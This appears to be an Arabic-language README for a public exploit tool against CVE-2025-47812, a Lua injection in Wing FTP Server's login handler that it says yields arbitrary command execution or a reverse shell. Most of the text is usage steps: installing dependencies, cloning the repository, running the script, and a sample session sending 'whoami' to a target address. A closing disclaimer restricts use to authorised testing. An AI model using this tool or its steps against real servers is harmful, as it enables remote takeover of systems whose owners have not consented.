
Wing FTP Server RCE عن طريق Lua Injection
يستغل هذا الاستغلال ثغرة حقن Lua في معالج تسجيل الدخول (loginok.html) لخادم Wing FTP Server لتنفيذ أوامر نظام تشغيل عشوائية أو الحصول على شل عكسي. يسيء استخدام تنفيذ كود Lua غير المنظف عبر وسيط username.
pip3قم بتثبيت الحزم المطلوبة باستخدام:
pip3 install -r requirements.txt
أو يدويًا:
pip3 install requests colorama
git clone https://github.com/0xgh057r3c0n/CVE-2025-47812.git
cd CVE-2025-47812
python3 CVE-2025-47812.py
قم بتشغيل السكريبت:
python3 CVE-2025-47812.py
whoami, id)Target URL (e.g., http://localhost:5466): http://192.168.1.100:5466
Username (e.g., anonymous): anonymous
Your choice (1 or 2): 1
Command to execute (default: whoami): whoami
تم توفير هذه الأداة لأغراض تعليمية واختبار أمان مصرح به فقط. أنت مسؤول عن أفعالك. استخدمها فقط على الأنظمة التي تملكها أو مصرح لك باختبارها.
هذا المشروع مرخص بموجب رخصة MIT. راجع ملف LICENSE للتفاصيل.